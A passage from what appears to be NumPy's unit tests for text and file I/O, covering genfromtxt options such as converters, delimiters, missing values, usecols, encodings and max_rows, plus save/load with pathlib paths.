func = lambda s: strptime(s.strip(), "%Y-%m-%d")
converters = {1: func}
test = np.genfromtxt(TextIO(data), delimiter=";", dtype=ndtype,
converters=converters)
control = np.array(
[(1, datetime(2001, 1, 1)), (2, datetime(2002, 1, 31))],
dtype=ndtype)
assert_equal(test, control)
ndtype = [('nest', [('idx', int), ('code', object)])]
with assert_raises_regex(NotImplementedError,
'Nested fields.* not supported.*'):
test = np.genfromtxt(TextIO(data), delimiter=";",
dtype=ndtype, converters=converters)
def test_userconverters_with_explicit_dtype(self):
# Test user_converters w/ explicit (standard) dtype
data = TextIO('skip,skip,2001-01-01,1.0,skip')
test = np.genfromtxt(data, delimiter=",", names=None, dtype=float,
usecols=(2, 3), converters={2: bytes})
control = np.array([('2001-01-01', 1.)],
dtype=[('', '|S10'), ('', float)])
assert_equal(test, control)
def test_utf8_userconverters_with_explicit_dtype(self):
utf8 = b'\xcf\x96'
with temppath() as path:
with open(path, 'wb') as f:
f.write(b'skip,skip,2001-01-01' + utf8 + b',1.0,skip')
test = np.genfromtxt(path, delimiter=",", names=None, dtype=float,
usecols=(2, 3), converters={2: np.unicode},
encoding='UTF-8')
control = np.array([('2001-01-01' + utf8.decode('UTF-8'), 1.)],
dtype=[('', '|U11'), ('', float)])
assert_equal(test, control)
def test_spacedelimiter(self):
# Test space delimiter
data = TextIO("1 2 3 4 5\n6 7 8 9 10")
test = np.genfromtxt(data)
control = np.array([[1., 2., 3., 4., 5.],
[6., 7., 8., 9., 10.]])
assert_equal(test, control)
def test_integer_delimiter(self):
# Test using an integer for delimiter
data = " 1 2 3\n 4 5 67\n890123 4"
test = np.genfromtxt(TextIO(data), delimiter=3)
control = np.array([[1, 2, 3], [4, 5, 67], [890, 123, 4]])
assert_equal(test, control)
def test_missing(self):
data = TextIO('1,2,3,,5\n')
test = np.genfromtxt(data, dtype=int, delimiter=',',
converters={3: lambda s: int(s or - 999)})
control = np.array([1, 2, 3, -999, 5], int)
assert_equal(test, control)
def test_missing_with_tabs(self):
# Test w/ a delimiter tab
txt = "1\t2\t3\n\t2\t\n1\t\t3"
test = np.genfromtxt(TextIO(txt), delimiter="\t",
usemask=True,)
ctrl_d = np.array([(1, 2, 3), (np.nan, 2, np.nan), (1, np.nan, 3)],)
ctrl_m = np.array([(0, 0, 0), (1, 0, 1), (0, 1, 0)], dtype=bool)
assert_equal(test.data, ctrl_d)
assert_equal(test.mask, ctrl_m)
def test_usecols(self):
# Test the selection of columns
# Select 1 column
control = np.array([[1, 2], [3, 4]], float)
data = TextIO()
np.savetxt(data, control)
data.seek(0)
test = np.genfromtxt(data, dtype=float, usecols=(1,))
assert_equal(test, control[:, 1])
#
control = np.array([[1, 2, 3], [3, 4, 5]], float)
data = TextIO()
np.savetxt(data, control)
data.seek(0)
test = np.genfromtxt(data, dtype=float, usecols=(1, 2))
assert_equal(test, control[:, 1:])
# Testing with arrays instead of tuples.
data.seek(0)
test = np.genfromtxt(data, dtype=float, usecols=np.array([1, 2]))
assert_equal(test, control[:, 1:])
def test_usecols_as_css(self):
# Test giving usecols with a comma-separated string
data = "1 2 3\n4 5 6"
test = np.genfromtxt(TextIO(data),
names="a, b, c", usecols="a, c")
ctrl = np.array([(1, 3), (4, 6)], dtype=[(_, float) for _ in "ac"])
assert_equal(test, ctrl)
def test_usecols_with_structured_dtype(self):
# Test usecols with an explicit structured dtype
data = TextIO("JOE 70.1 25.3\nBOB 60.5 27.9")
names = ['stid', 'temp']
dtypes = ['S4', 'f8']
test = np.genfromtxt(
data, usecols=(0, 2), dtype=list(zip(names, dtypes)))
assert_equal(test['stid'], [b"JOE", b"BOB"])
assert_equal(test['temp'], [25.3, 27.9])
def test_usecols_with_integer(self):
# Test usecols with an integer
test = np.genfromtxt(TextIO(b"1 2 3\n4 5 6"), usecols=0)
assert_equal(test, np.array([1., 4.]))
def test_usecols_with_named_columns(self):
# Test usecols with named columns
ctrl = np.array([(1, 3), (4, 6)], dtype=[('a', float), ('c', float)])
data = "1 2 3\n4 5 6"
kwargs = dict(names="a, b, c")
test = np.genfromtxt(TextIO(data), usecols=(0, -1), **kwargs)
assert_equal(test, ctrl)
test = np.genfromtxt(TextIO(data),
usecols=('a', 'c'), **kwargs)
assert_equal(test, ctrl)
def test_empty_file(self):
# Test that an empty file raises the proper warning.
with suppress_warnings() as sup:
sup.filter(message="genfromtxt: Empty input file:")
data = TextIO()
test = np.genfromtxt(data)
assert_equal(test, np.array([]))
# when skip_header > 0
test = np.genfromtxt(data, skip_header=1)
assert_equal(test, np.array([]))
def test_fancy_dtype_alt(self):
# Check that a nested dtype isn't MIA
data = TextIO('1,2,3.0\n4,5,6.0\n')
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = np.genfromtxt(data, dtype=fancydtype, delimiter=',', usemask=True)
control = ma.array([(1, (2, 3.0)), (4, (5, 6.0))], dtype=fancydtype)
assert_equal(test, control)
def test_shaped_dtype(self):
c = TextIO("aaaa 1.0 8.0 1 2 3 4 5 6")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 3))])
x = np.genfromtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0, [[1, 2, 3], [4, 5, 6]])],
dtype=dt)
assert_array_equal(x, a)
def test_withmissing(self):
data = TextIO('A,B\n0,1\n2,N/A')
kwargs = dict(delimiter=",", missing_values="N/A", names=True)
test = np.genfromtxt(data, dtype=None, usemask=True, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', int), ('B', int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
#
data.seek(0)
test = np.genfromtxt(data, usemask=True, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', float), ('B', float)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
def test_user_missing_values(self):
data = "A, B, C\n0, 0., 0j\n1, N/A, 1j\n-9, 2.2, N/A\n3, -99, 3j"
basekwargs = dict(dtype=None, delimiter=",", names=True,)
mdtype = [('A', int), ('B', float), ('C', complex)]
#
test = np.genfromtxt(TextIO(data), missing_values="N/A",
**basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (0, 0, 1), (0, 0, 0)],
dtype=mdtype)
assert_equal(test, control)
#
basekwargs['dtype'] = mdtype
test = np.genfromtxt(TextIO(data),
missing_values={0: -9, 1: -99, 2: -999j}, usemask=True, **basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
dtype=mdtype)
assert_equal(test, control)
#
test = np.genfromtxt(TextIO(data),
missing_values={0: -9, 'B': -99, 'C': -999j},
usemask=True,
**basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
dtype=mdtype)
assert_equal(test, control)
def test_user_filling_values(self):
# Test with missing and filling values
ctrl = np.array([(0, 3), (4, -999)], dtype=[('a', int), ('b', int)])
data = "N/A, 2, 3\n4, ,???"
kwargs = dict(delimiter=",",
dtype=int,
names="a,b,c",
missing_values={0: "N/A", 'b': " ", 2: "???"},
filling_values={0: 0, 'b': 0, 2: -999})
test = np.genfromtxt(TextIO(data), **kwargs)
ctrl = np.array([(0, 2, 3), (4, 0, -999)],
dtype=[(_, int) for _ in "abc"])
assert_equal(test, ctrl)
#
test = np.genfromtxt(TextIO(data), usecols=(0, -1), **kwargs)
ctrl = np.array([(0, 3), (4, -999)], dtype=[(_, int) for _ in "ac"])
assert_equal(test, ctrl)
data2 = "1,2,*,4\n5,*,7,8\n"
test = np.genfromtxt(TextIO(data2), delimiter=',', dtype=int,
missing_values="*", filling_values=0)
ctrl = np.array([[1, 2, 0, 4], [5, 0, 7, 8]])
assert_equal(test, ctrl)
test = np.genfromtxt(TextIO(data2), delimiter=',', dtype=int,
missing_values="*", filling_values=-1)
ctrl = np.array([[1, 2, -1, 4], [5, -1, 7, 8]])
assert_equal(test, ctrl)
def test_withmissing_float(self):
data = TextIO('A,B\n0,1.5\n2,-999.00')
test = np.genfromtxt(data, dtype=None, delimiter=',',
missing_values='-999.0', names=True, usemask=True)
control = ma.array([(0, 1.5), (2, -1.)],
mask=[(False, False), (False, True)],
dtype=[('A', int), ('B', float)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
def test_with_masked_column_uniform(self):
# Test masked column
data = TextIO('1 2 3\n4 5 6\n')
test = np.genfromtxt(data, dtype=None,
missing_values='2,5', usemask=True)
control = ma.array([[1, 2, 3], [4, 5, 6]], mask=[[0, 1, 0], [0, 1, 0]])
assert_equal(test, control)
def test_with_masked_column_various(self):
# Test masked column
data = TextIO('True 2 3\nFalse 5 6\n')
test = np.genfromtxt(data, dtype=None,
missing_values='2,5', usemask=True)
control = ma.array([(1, 2, 3), (0, 5, 6)],
mask=[(0, 1, 0), (0, 1, 0)],
dtype=[('f0', bool), ('f1', bool), ('f2', int)])
assert_equal(test, control)
def test_invalid_raise(self):
# Test invalid raise
data = ["1, 1, 1, 1, 1"] * 50
for i in range(5):
data[10 * i] = "2, 2, 2, 2 2"
data.insert(0, "a, b, c, d, e")
mdata = TextIO("\n".join(data))
#
kwargs = dict(delimiter=",", dtype=None, names=True)
# XXX: is there a better way to get the return value of the
# callable in assert_warns ?
ret = {}
def f(_ret={}):
_ret['mtest'] = np.genfromtxt(mdata, invalid_raise=False, **kwargs)
assert_warns(ConversionWarning, f, _ret=ret)
mtest = ret['mtest']
assert_equal(len(mtest), 45)
assert_equal(mtest, np.ones(45, dtype=[(_, int) for _ in 'abcde']))
#
mdata.seek(0)
assert_raises(ValueError, np.genfromtxt, mdata,
delimiter=",", names=True)
def test_invalid_raise_with_usecols(self):
# Test invalid_raise with usecols
data = ["1, 1, 1, 1, 1"] * 50
for i in range(5):
data[10 * i] = "2, 2, 2, 2 2"
data.insert(0, "a, b, c, d, e")
mdata = TextIO("\n".join(data))
kwargs = dict(delimiter=",", dtype=None, names=True,
invalid_raise=False)
# XXX: is there a better way to get the return value of the
# callable in assert_warns ?
ret = {}
def f(_ret={}):
_ret['mtest'] = np.genfromtxt(mdata, usecols=(0, 4), **kwargs)
assert_warns(ConversionWarning, f, _ret=ret)
mtest = ret['mtest']
assert_equal(len(mtest), 45)
assert_equal(mtest, np.ones(45, dtype=[(_, int) for _ in 'ae']))
#
mdata.seek(0)
mtest = np.genfromtxt(mdata, usecols=(0, 1), **kwargs)
assert_equal(len(mtest), 50)
control = np.ones(50, dtype=[(_, int) for _ in 'ab'])
control[[10 * _ for _ in range(5)]] = (2, 2)
assert_equal(mtest, control)
def test_inconsistent_dtype(self):
# Test inconsistent dtype
data = ["1, 1, 1, 1, -1.1"] * 50
mdata = TextIO("\n".join(data))
converters = {4: lambda x: "(%s)" % x}
kwargs = dict(delimiter=",", converters=converters,
dtype=[(_, int) for _ in 'abcde'],)
assert_raises(ValueError, np.genfromtxt, mdata, **kwargs)
def test_default_field_format(self):
# Test default format
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.genfromtxt(TextIO(data),
delimiter=",", dtype=None, defaultfmt="f%02i")
ctrl = np.array([(0, 1, 2.3), (4, 5, 6.7)],
dtype=[("f00", int), ("f01", int), ("f02", float)])
assert_equal(mtest, ctrl)
def test_single_dtype_wo_names(self):
# Test single dtype w/o names
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.genfromtxt(TextIO(data),
delimiter=",", dtype=float, defaultfmt="f%02i")
ctrl = np.array([[0., 1., 2.3], [4., 5., 6.7]], dtype=float)
assert_equal(mtest, ctrl)
def test_single_dtype_w_explicit_names(self):
# Test single dtype w explicit names
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.genfromtxt(TextIO(data),
delimiter=",", dtype=float, names="a, b, c")
ctrl = np.array([(0., 1., 2.3), (4., 5., 6.7)],
dtype=[(_, float) for _ in "abc"])
assert_equal(mtest, ctrl)
def test_single_dtype_w_implicit_names(self):
# Test single dtype w implicit names
data = "a, b, c\n0, 1, 2.3\n4, 5, 6.7"
mtest = np.genfromtxt(TextIO(data),
delimiter=",", dtype=float, names=True)
ctrl = np.array([(0., 1., 2.3), (4., 5., 6.7)],
dtype=[(_, float) for _ in "abc"])
assert_equal(mtest, ctrl)
def test_easy_structured_dtype(self):
# Test easy structured dtype
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.genfromtxt(TextIO(data), delimiter=",",
dtype=(int, float, float), defaultfmt="f_%02i")
ctrl = np.array([(0, 1., 2.3), (4, 5., 6.7)],
dtype=[("f_00", int), ("f_01", float), ("f_02", float)])
assert_equal(mtest, ctrl)
def test_autostrip(self):
# Test autostrip
data = "01/01/2003 , 1.3, abcde"
kwargs = dict(delimiter=",", dtype=None)
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
mtest = np.genfromtxt(TextIO(data), **kwargs)
assert_(w[0].category is np.VisibleDeprecationWarning)
ctrl = np.array([('01/01/2003 ', 1.3, ' abcde')],
dtype=[('f0', '|S12'), ('f1', float), ('f2', '|S8')])
assert_equal(mtest, ctrl)
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
mtest = np.genfromtxt(TextIO(data), autostrip=True, **kwargs)
assert_(w[0].category is np.VisibleDeprecationWarning)
ctrl = np.array([('01/01/2003', 1.3, 'abcde')],
dtype=[('f0', '|S10'), ('f1', float), ('f2', '|S5')])
assert_equal(mtest, ctrl)
def test_replace_space(self):
# Test the 'replace_space' option
txt = "A.A, B (B), C:C\n1, 2, 3.14"
# Test default: replace ' ' by '_' and delete non-alphanum chars
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=None)
ctrl_dtype = [("AA", int), ("B_B", int), ("CC", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no replace, no delete
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=None,
replace_space='', deletechars='')
ctrl_dtype = [("A.A", int), ("B (B)", int), ("C:C", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no delete (spaces are replaced by _)
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=None,
deletechars='')
ctrl_dtype = [("A.A", int), ("B_(B)", int), ("C:C", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
def test_replace_space_known_dtype(self):
# Test the 'replace_space' (and related) options when dtype != None
txt = "A.A, B (B), C:C\n1, 2, 3"
# Test default: replace ' ' by '_' and delete non-alphanum chars
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=int)
ctrl_dtype = [("AA", int), ("B_B", int), ("CC", int)]
ctrl = np.array((1, 2, 3), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no replace, no delete
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=int,
replace_space='', deletechars='')
ctrl_dtype = [("A.A", int), ("B (B)", int), ("C:C", int)]
ctrl = np.array((1, 2, 3), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no delete (spaces are replaced by _)
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=int,
deletechars='')
ctrl_dtype = [("A.A", int), ("B_(B)", int), ("C:C", int)]
ctrl = np.array((1, 2, 3), dtype=ctrl_dtype)
assert_equal(test, ctrl)
def test_incomplete_names(self):
# Test w/ incomplete names
data = "A,,C\n0,1,2\n3,4,5"
kwargs = dict(delimiter=",", names=True)
# w/ dtype=None
ctrl = np.array([(0, 1, 2), (3, 4, 5)],
dtype=[(_, int) for _ in ('A', 'f0', 'C')])
test = np.genfromtxt(TextIO(data), dtype=None, **kwargs)
assert_equal(test, ctrl)
# w/ default dtype
ctrl = np.array([(0, 1, 2), (3, 4, 5)],
dtype=[(_, float) for _ in ('A', 'f0', 'C')])
test = np.genfromtxt(TextIO(data), **kwargs)
def test_names_auto_completion(self):
# Make sure that names are properly completed
data = "1 2 3\n 4 5 6"
test = np.genfromtxt(TextIO(data),
dtype=(int, float, int), names="a")
ctrl = np.array([(1, 2, 3), (4, 5, 6)],
dtype=[('a', int), ('f0', float), ('f1', int)])
assert_equal(test, ctrl)
def test_names_with_usecols_bug1636(self):
# Make sure we pick up the right names w/ usecols
data = "A,B,C,D,E\n0,1,2,3,4\n0,1,2,3,4\n0,1,2,3,4"
ctrl_names = ("A", "C", "E")
test = np.genfromtxt(TextIO(data),
dtype=(int, int, int), delimiter=",",
usecols=(0, 2, 4), names=True)
assert_equal(test.dtype.names, ctrl_names)
#
test = np.genfromtxt(TextIO(data),
dtype=(int, int, int), delimiter=",",
usecols=("A", "C", "E"), names=True)
assert_equal(test.dtype.names, ctrl_names)
#
test = np.genfromtxt(TextIO(data),
dtype=int, delimiter=",",
usecols=("A", "C", "E"), names=True)
assert_equal(test.dtype.names, ctrl_names)
def test_fixed_width_names(self):
# Test fix-width w/ names
data = " A B C\n 0 1 2.3\n 45 67 9."
kwargs = dict(delimiter=(5, 5, 4), names=True, dtype=None)
ctrl = np.array([(0, 1, 2.3), (45, 67, 9.)],
dtype=[('A', int), ('B', int), ('C', float)])
test = np.genfromtxt(TextIO(data), **kwargs)
assert_equal(test, ctrl)
#
kwargs = dict(delimiter=5, names=True, dtype=None)
ctrl = np.array([(0, 1, 2.3), (45, 67, 9.)],
dtype=[('A', int), ('B', int), ('C', float)])
test = np.genfromtxt(TextIO(data), **kwargs)
assert_equal(test, ctrl)
def test_filling_values(self):
# Test missing values
data = b"1, 2, 3\n1, , 5\n0, 6, \n"
kwargs = dict(delimiter=",", dtype=None, filling_values=-999)
ctrl = np.array([[1, 2, 3], [1, -999, 5], [0, 6, -999]], dtype=int)
test = np.genfromtxt(TextIO(data), **kwargs)
assert_equal(test, ctrl)
def test_comments_is_none(self):
# Github issue 329 (None was previously being converted to 'None').
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(TextIO("test1,testNonetherestofthedata"),
dtype=None, comments=None, delimiter=',')
assert_(w[0].category is np.VisibleDeprecationWarning)
assert_equal(test[1], b'testNonetherestofthedata')
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(TextIO("test1, testNonetherestofthedata"),
dtype=None, comments=None, delimiter=',')
assert_(w[0].category is np.VisibleDeprecationWarning)
assert_equal(test[1], b' testNonetherestofthedata')
def test_latin1(self):
latin1 = b'\xf6\xfc\xf6'
norm = b"norm1,norm2,norm3\n"
enc = b"test1,testNonethe" + latin1 + b",test3\n"
s = norm + enc + norm
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(TextIO(s),
dtype=None, comments=None, delimiter=',')
assert_(w[0].category is np.VisibleDeprecationWarning)
assert_equal(test[1, 0], b"test1")
assert_equal(test[1, 1], b"testNonethe" + latin1)
assert_equal(test[1, 2], b"test3")
test = np.genfromtxt(TextIO(s),
dtype=None, comments=None, delimiter=',',
encoding='latin1')
assert_equal(test[1, 0], u"test1")
assert_equal(test[1, 1], u"testNonethe" + latin1.decode('latin1'))
assert_equal(test[1, 2], u"test3")
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(TextIO(b"0,testNonethe" + latin1),
dtype=None, comments=None, delimiter=',')
assert_(w[0].category is np.VisibleDeprecationWarning)
assert_equal(test['f0'], 0)
assert_equal(test['f1'], b"testNonethe" + latin1)
def test_binary_decode_autodtype(self):
utf16 = b'\xff\xfeh\x04 \x00i\x04 \x00j\x04'
v = self.loadfunc(BytesIO(utf16), dtype=None, encoding='UTF-16')
assert_array_equal(v, np.array(utf16.decode('UTF-16').split()))
def test_utf8_byte_encoding(self):
utf8 = b"\xcf\x96"
norm = b"norm1,norm2,norm3\n"
enc = b"test1,testNonethe" + utf8 + b",test3\n"
s = norm + enc + norm
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(TextIO(s),
dtype=None, comments=None, delimiter=',')
assert_(w[0].category is np.VisibleDeprecationWarning)
ctl = np.array([
[b'norm1', b'norm2', b'norm3'],
[b'test1', b'testNonethe' + utf8, b'test3'],
[b'norm1', b'norm2', b'norm3']])
assert_array_equal(test, ctl)
def test_utf8_file(self):
utf8 = b"\xcf\x96"
with temppath() as path:
with open(path, "wb") as f:
f.write((b"test1,testNonethe" + utf8 + b",test3\n") * 2)
test = np.genfromtxt(path, dtype=None, comments=None,
delimiter=',', encoding="UTF-8")
ctl = np.array([
["test1", "testNonethe" + utf8.decode("UTF-8"), "test3"],
["test1", "testNonethe" + utf8.decode("UTF-8"), "test3"]],
dtype=np.unicode)
assert_array_equal(test, ctl)
# test a mixed dtype
with open(path, "wb") as f:
f.write(b"0,testNonethe" + utf8)
test = np.genfromtxt(path, dtype=None, comments=None,
delimiter=',', encoding="UTF-8")
assert_equal(test['f0'], 0)
assert_equal(test['f1'], "testNonethe" + utf8.decode("UTF-8"))
def test_utf8_file_nodtype_unicode(self):
# bytes encoding with non-latin1 -> unicode upcast
utf8 = u'\u03d6'
latin1 = u'\xf6\xfc\xf6'
# skip test if cannot encode utf8 test string with preferred
# encoding. The preferred encoding is assumed to be the default
# encoding of io.open. Will need to change this for PyTest, maybe
# using pytest.mark.xfail(raises=***).
try:
encoding = locale.getpreferredencoding()
utf8.encode(encoding)
except (UnicodeError, ImportError):
pytest.skip('Skipping test_utf8_file_nodtype_unicode, '
'unable to encode utf8 in preferred encoding')
with temppath() as path:
with io.open(path, "wt") as f:
f.write(u"norm1,norm2,norm3\n")
f.write(u"norm1," + latin1 + u",norm3\n")
f.write(u"test1,testNonethe" + utf8 + u",test3\n")
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '',
np.VisibleDeprecationWarning)
test = np.genfromtxt(path, dtype=None, comments=None,
delimiter=',')
# Check for warning when encoding not specified.
assert_(w[0].category is np.VisibleDeprecationWarning)
ctl = np.array([
["norm1", "norm2", "norm3"],
["norm1", latin1, "norm3"],
["test1", "testNonethe" + utf8, "test3"]],
dtype=np.unicode)
assert_array_equal(test, ctl)
def test_recfromtxt(self):
#
data = TextIO('A,B\n0,1\n2,3')
kwargs = dict(delimiter=",", missing_values="N/A", names=True)
test = np.recfromtxt(data, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', int), ('B', int)])
assert_(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = TextIO('A,B\n0,1\n2,N/A')
test = np.recfromtxt(data, dtype=None, usemask=True, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', int), ('B', int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(test.A, [0, 2])
def test_recfromcsv(self):
#
data = TextIO('A,B\n0,1\n2,3')
kwargs = dict(missing_values="N/A", names=True, case_sensitive=True)
test = np.recfromcsv(data, dtype=None, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', int), ('B', int)])
assert_(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = TextIO('A,B\n0,1\n2,N/A')
test = np.recfromcsv(data, dtype=None, usemask=True, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', int), ('B', int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(test.A, [0, 2])
#
data = TextIO('A,B\n0,1\n2,3')
test = np.recfromcsv(data, missing_values='N/A',)
control = np.array([(0, 1), (2, 3)],
dtype=[('a', int), ('b', int)])
assert_(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = TextIO('A,B\n0,1\n2,3')
dtype = [('a', int), ('b', float)]
test = np.recfromcsv(data, missing_values='N/A', dtype=dtype)
control = np.array([(0, 1), (2, 3)],
dtype=dtype)
assert_(isinstance(test, np.recarray))
assert_equal(test, control)
#gh-10394
data = TextIO('color\n"red"\n"blue"')
test = np.recfromcsv(data, converters={0: lambda x: x.strip(b'\"')})
control = np.array([('red',), ('blue',)], dtype=[('color', (bytes, 4))])
assert_equal(test.dtype, control.dtype)
assert_equal(test, control)
def test_max_rows(self):
# Test the `max_rows` keyword argument.
data = '1 2\n3 4\n5 6\n7 8\n9 10\n'
txt = TextIO(data)
a1 = np.genfromtxt(txt, max_rows=3)
a2 = np.genfromtxt(txt)
assert_equal(a1, [[1, 2], [3, 4], [5, 6]])
assert_equal(a2, [[7, 8], [9, 10]])
# max_rows must be at least 1.
assert_raises(ValueError, np.genfromtxt, TextIO(data), max_rows=0)
# An input with several invalid rows.
data = '1 1\n2 2\n0 \n3 3\n4 4\n5 \n6 \n7 \n'
test = np.genfromtxt(TextIO(data), max_rows=2)
control = np.array([[1., 1.], [2., 2.]])
assert_equal(test, control)
# Test keywords conflict
assert_raises(ValueError, np.genfromtxt, TextIO(data), skip_footer=1,
max_rows=4)
# Test with invalid value
assert_raises(ValueError, np.genfromtxt, TextIO(data), max_rows=4)
# Test with invalid not raise
with suppress_warnings() as sup:
sup.filter(ConversionWarning)
test = np.genfromtxt(TextIO(data), max_rows=4, invalid_raise=False)
control = np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]])
assert_equal(test, control)
test = np.genfromtxt(TextIO(data), max_rows=5, invalid_raise=False)
control = np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]])
assert_equal(test, control)
# Structured array with field names.
data = 'a b\n#c d\n1 1\n2 2\n#0 \n3 3\n4 4\n5 5\n'
# Test with header, names and comments
txt = TextIO(data)
test = np.genfromtxt(txt, skip_header=1, max_rows=3, names=True)
control = np.array([(1.0, 1.0), (2.0, 2.0), (3.0, 3.0)],
dtype=[('c', '<f8'), ('d', '<f8')])
assert_equal(test, control)
# To continue reading the same "file", don't use skip_header or
# names, and use the previously determined dtype.
test = np.genfromtxt(txt, max_rows=None, dtype=test.dtype)
control = np.array([(4.0, 4.0), (5.0, 5.0)],
dtype=[('c', '<f8'), ('d', '<f8')])
assert_equal(test, control)
def test_gft_using_filename(self):
# Test that we can load data from a filename as well as a file
# object
tgt = np.arange(6).reshape((2, 3))
linesep = ('\n', '\r\n', '\r')
for sep in linesep:
data = '0 1 2' + sep + '3 4 5'
with temppath() as name:
with open(name, 'w') as f:
f.write(data)
res = np.genfromtxt(name)
assert_array_equal(res, tgt)
def test_gft_from_gzip(self):
# Test that we can load data from a gzipped file
wanted = np.arange(6).reshape((2, 3))
linesep = ('\n', '\r\n', '\r')
for sep in linesep:
data = '0 1 2' + sep + '3 4 5'
s = BytesIO()
with gzip.GzipFile(fileobj=s, mode='w') as g:
g.write(asbytes(data))
with temppath(suffix='.gz2') as name:
with open(name, 'w') as f:
f.write(data)
assert_array_equal(np.genfromtxt(name), wanted)
def test_gft_using_generator(self):
# gft doesn't work with unicode.
def count():
for i in range(10):
yield asbytes("%d" % i)
res = np.genfromtxt(count())
assert_array_equal(res, np.arange(10))
def test_auto_dtype_largeint(self):
# Regression test for numpy/numpy#5635 whereby large integers could
# cause OverflowErrors.
# Test the automatic definition of the output dtype
#
# 2**66 = 73786976294838206464 => should convert to float
# 2**34 = 17179869184 => should convert to int64
# 2**10 = 1024 => should convert to int (int32 on 32-bit systems,
# int64 on 64-bit systems)
data = TextIO('73786976294838206464 17179869184 1024')
test = np.genfromtxt(data, dtype=None)
assert_equal(test.dtype.names, ['f0', 'f1', 'f2'])
assert_(test.dtype['f0'] == float)
assert_(test.dtype['f1'] == np.int64)
assert_(test.dtype['f2'] == np.integer)
assert_allclose(test['f0'], 73786976294838206464.)
assert_equal(test['f1'], 17179869184)
assert_equal(test['f2'], 1024)
@pytest.mark.skipif(Path is None, reason="No pathlib.Path")
class TestPathUsage(object):
# Test that pathlib.Path can be used
def test_loadtxt(self):
with temppath(suffix='.txt') as path:
path = Path(path)
a = np.array([[1.1, 2], [3, 4]])
np.savetxt(path, a)
x = np.loadtxt(path)
assert_array_equal(x, a)
def test_save_load(self):
# Test that pathlib.Path instances can be used with save.
with temppath(suffix='.npy') as path:
path = Path(path)
a = np.array([[1, 2], [3, 4]], int)
np.save(path, a)
data = np.load(path)
assert_array_equal(data, a)
def test_save_load_memmap(self):
# Test that pathlib.Path instances can be loaded mem-mapped.
with temppath(suffix='.npy') as path:
path = Path(path)
a = np.array([[1, 2], [3, 4]], int)
np.save(path, a)
data = np.load(path, mmap_mode='r')
assert_array_equal(data, a)
# close the mem-mapped file
del data
def test_save_load_memmap_readwrite(self):
# Test that pathlib.Path instances can be written mem-mapped.
with temppath(suffix='.npy') as path:
path = Path(path)
a = np.array([[1, 2], [3, 4]], int)
np.save(path, a)
b = np.load(path, mmap_mode='r+')
a[0][0] = 5
b[0][0] = 5
del b # closes the file
data = np.load(path)
assert_array_equal(data, a)
def test_savez_load(self):
# Test that pathlib.Path instances can be used with savez.
with temppath(suffix='.npz') as path:
path = Path(path)
np.savez(path, lab='place holder')
with np.load(path) as data:
assert_array_equal(data['lab'], 'place holder')
def test_savez_compressed_load(self):
# Test that pathlib.Path instances can be used with savez.
with temppath(suffix='.npz') as path:
path = Path(path)
np.savez_compressed(path, lab='place holder')
data = np.load(path)
assert_array_equal(data['lab'], 'place holder')
data.close()
def test_genfromtxt(self):
